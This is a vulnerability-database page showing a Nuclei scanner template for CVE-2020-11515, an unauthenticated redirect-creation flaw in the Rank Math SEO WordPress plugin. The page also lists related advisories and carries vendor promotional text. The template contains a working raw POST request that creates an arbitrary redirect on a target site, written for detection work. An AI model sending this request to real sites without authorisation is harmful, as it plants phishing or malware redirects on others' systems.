Lucene search
K

Rank Math SEO <= 1.0.40.2 - Redirect Creation via Unprotected REST API Endpoint

🗓️ 10 Jul 2026 03:01:38Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 15 Views

Rank Math SEO up to 1.0.40.2 allows unauthenticated redirection URI creation via an unprotected REST endpoint.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2020-11515
15 Sep 202521:55
circl
CNVD
WordPress Rank Math Input Validation Error Vulnerability
8 Apr 202000:00
cnvd
CVE
CVE-2020-11515
7 Apr 202016:51
cve
Cvelist
CVE-2020-11515
7 Apr 202016:51
cvelist
EUVD
EUVD-2020-3868
7 Oct 202500:30
euvd
NVD
CVE-2020-11515
7 Apr 202017:15
nvd
OpenVAS
WordPress Rank Math SEO Plugin < 1.0.41 Multiple REST API Vulnerabilities
2 Apr 202000:00
openvas
OSV
CVE-2020-11515
7 Apr 202017:15
osv
Prion
Open redirect
7 Apr 202017:15
prion
Positive Technologies
PT-2020-12659
7 Apr 202000:00
ptsecurity
Rows per page
id: CVE-2020-11515

info:
  name: Rank Math SEO <= 1.0.40.2 - Redirect Creation via Unprotected REST API Endpoint
  author: s4e-io
  severity: medium
  description: |
    The Rank Math plugin through 1.0.40.2 for WordPress allows unauthenticated remote attackers to create new URIs (that redirect to an external web site) via the unsecured rankmath/v1/updateRedirection REST API endpoint. In other words, this is not an "Open Redirect" issue; instead, it allows the attacker to create a new URI with an arbitrary name (e.g., the /exampleredirect URI).
  impact: |
    Unauthenticated attackers can create arbitrary redirect URIs on the WordPress site, which can be used for phishing attacks, SEO manipulation, or distributing malware by redirecting users to malicious external sites.
  remediation: |
    Update the Rank Math SEO plugin to version 1.0.41 or later.
  reference:
    - https://www.wordfence.com/blog/2020/03/critical-vulnerabilities-affecting-over-200000-sites-patched-in-rank-math-seo-plugin/
    - https://rankmath.com/changelog/
    - https://wordpress.org/plugins/seo-by-rank-math/#developers
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-11515
    cwe-id: CWE-601
    epss-score: 0.02072
    epss-percentile: 0.79196
    cpe: cpe:2.3:a:rankmath:seo:*:*:*:*:free:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: rankmath
    product: seo
    framework: wordpress
    publicwww-query: "/wp-content/plugins/seo-by-rank-math/"
  tags: cve,cve2020,wordpress,wordfence,redirect,seo-by-rank-math,wp-plugin,wp,vkev,vuln

http:
  - raw:
      - |
        POST /wp-json/rankmath/v1/updateRedirection HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "redirectionUrl": "http://{{to_lower(rand_text_alpha(20))}}.{{to_lower(rand_text_alpha(5))}}",
          "redirectionSources": "/{{to_lower(rand_text_alpha(10))}}",
          "hasRedirect": "true"
        }

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "update","Redirection updated successfully.")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100ae5c71340e881543195f5488cb6086c7d3fbb4cd29203ca787717ec5f841de9802206b5b00f2f6d668fa2a0ad9ad29d012e006ee944fde86ca37d1654a98aea212a5:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 25.8
CVSS 3.16.1
EPSS0.02072
15